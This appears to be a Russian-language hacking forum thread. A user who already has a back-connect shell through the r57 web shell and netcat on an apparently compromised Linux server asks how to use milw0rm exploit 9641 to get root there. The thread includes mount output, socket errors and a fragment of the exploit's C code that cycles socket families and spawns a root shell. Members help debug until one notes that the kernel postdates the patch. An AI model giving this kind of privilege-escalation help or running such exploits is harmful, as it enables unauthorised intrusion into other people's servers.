Скачал сплоит под Linux http://milw0rm.com/exploits/9641 Помогите разобраться с его использованием. Необходимо получить рута на Запускаю netcat и через r57 с помощью back-connect'а получаю консоль, далее: Подскажите пожалуйста что не так делаю?
Понял свой косяк!!! Спасибо за наводку ShAnKaR Code: mount /dev/sda5 on / type ext3 (rw) none on /proc type proc (rw) none on /sys type sysfs (rw) none on /dev/pts type devpts (rw,gid=5,mode=620) usbfs on /proc/bus/usb type usbfs (rw) /dev/sda1 on /boot type ext3 (rw) none on /dev/shm type tmpfs (rw,noexec,nosuid,nodev) /dev/sda2 on /tmp type ext3 (rw,noexec,nosuid,nodev) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) Теперь выдает: Code: sh run socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol
Теперь выдает: Code: sh run socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol Ну что, теперь открой исходник и посмотри логику, которая ведет к данному сообщению. (капитан очевидность)
Ruskey, полагаю в exploit.c возникает в условии, но что подправить я не знаю... Code: exploit: if (s[i][0] == PF_MAX) exit(EXIT_FAILURE); if ((out_fd = socket(s[i][0], s[i][1], s[i][2])) == -1) { perror("socket"); i++; goto exploit; } sendfile(out_fd, in_fd, NULL, PAGE_SIZE); if (getuid() || getgid()) { close(out_fd); i++; goto exploit; } execl("/bin/sh", "sh", "-i", NULL); exit(EXIT_SUCCESS); }
M@rtein Информация об уязвимости была опубликована 13 августа (патч был сделан в тот же день). А ваше ядро было собрано 31го. Отсюда вывод: рута через этот сплойт не получить.
oRb спасибо за ответ. Теперь буду это учитывать. И кстати вот тоже может кто подскажет по XNU Darwin. Ссылка на тему на ачате http://forum.antichat.ru/showthread.php?t=135264
